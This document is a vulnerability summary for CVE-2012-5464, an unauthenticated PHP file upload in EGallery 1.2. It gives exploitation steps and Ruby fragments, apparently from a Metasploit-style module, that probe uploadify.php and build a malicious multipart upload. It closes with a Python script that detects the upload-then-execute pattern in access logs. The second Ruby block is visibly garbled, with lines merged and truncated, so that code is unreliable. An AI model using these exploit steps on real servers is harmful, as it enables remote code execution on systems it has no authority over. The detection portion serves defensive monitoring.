## Critical Vulnerability Information

- **Vulnerability Name**: EGallery PHP File Upload Vulnerability
- **Description**: In EGallery 1.2, malicious users can exploit the `uploadify.php` file to upload files to the `egallery/` directory without any authentication, leading to arbitrary code execution.
- **Affected Versions**: EGallery 1.2
- **CVE ID**: CVE-2012-5464
- **Disclosure Date**: 2012-07-08
- **Exploitation Method**:
  - Malicious users can upload PHP files to the server's `egallery` directory.
  - A POST request is sent containing a file with malicious PHP code.
  - After a successful upload, the PHP file is executed via a GET request to achieve code execution.

### Exploitation Steps

1. **Check Target URL**:

```ruby
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
  'method' => 'GET',
  'uri'    => normalize_uri(uri, "egallery", "uploadify.php")
})
```

2. **Construct and Send Malicious File**:

```ruby
payload_name = rand_text_alpha(rand(10) + 5) + '.php'
boundary = "---------------------------" + rand_text_hex(7)
post_data = "--#{boundary}\r\n"
post_data \r\n"
post_data 'GET', 'uri' => normalize_uri("#{uri}#{payload_name}") })
```

### Notes

- **Reliability**: Unknown
- **Stability**: Unknown
- **Side Effects**: Unknown
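The two-step pattern described above (an unauthenticated POST to `egallery/uploadify.php` followed by a GET to a freshly named `.php` file under `egallery/`) is visible in ordinary web server access logs. The following detection script is an added example written for this page, not code from the original module or from EGallery; it assumes Apache combined log format and uses constructed sample log lines with documentation-range IP addresses.

```python
import re
from datetime import datetime, timedelta

# Apache combined log format (assumption); timestamp parsed as %d/%b/%Y:%H:%M:%S %z
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_ENDPOINT = "/egallery/uploadify.php"          # the vulnerable upload handler
DROPPED_PHP = re.compile(r'^/egallery/[^/]+\.php$', re.IGNORECASE)
WINDOW = timedelta(minutes=10)                       # max gap between upload and first GET

# Constructed sample traffic: one attack sequence and one unrelated visitor.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jul/2012:10:14:02 +0000] "GET /egallery/uploadify.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Jul/2012:10:14:05 +0000] "POST /egallery/uploadify.php HTTP/1.1" 200 54 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Jul/2012:10:14:07 +0000] "GET /egallery/kqzrtwa.php HTTP/1.1" 200 17 "-" "Mozilla/5.0"
198.51.100.9 - - [08/Jul/2012:10:20:00 +0000] "GET /egallery/photos.php HTTP/1.1" 200 2044 "-" "Mozilla/5.0"
"""

def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]      # drop any query string
    return rec

def detect(lines):
    """Return (ip, path, status) for every GET of a .php file under /egallery/
    that follows a POST to uploadify.php from the same IP within WINDOW."""
    last_upload = {}   # ip -> timestamp of the most recent POST to the upload handler
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].lower() == UPLOAD_ENDPOINT:
            last_upload[rec["ip"]] = rec["ts"]
        elif (rec["method"] == "GET" and DROPPED_PHP.match(rec["path"])
              and rec["path"].lower() != UPLOAD_ENDPOINT
              and rec["ip"] in last_upload
              and rec["ts"] - last_upload[rec["ip"]] <= WINDOW):
            alerts.append((rec["ip"], rec["path"], rec["status"]))
    return alerts

if __name__ == "__main__":
    for ip, path, status in detect(SAMPLE_LOG.splitlines()):
        print(f"possible EGallery upload-then-execute from {ip}: {path} ({status})")
```

A POST to `uploadify.php` on its own is also worth alerting on if the gallery is not meant to accept uploads from unauthenticated clients; the follow-up GET is what distinguishes a completed upload from a probe.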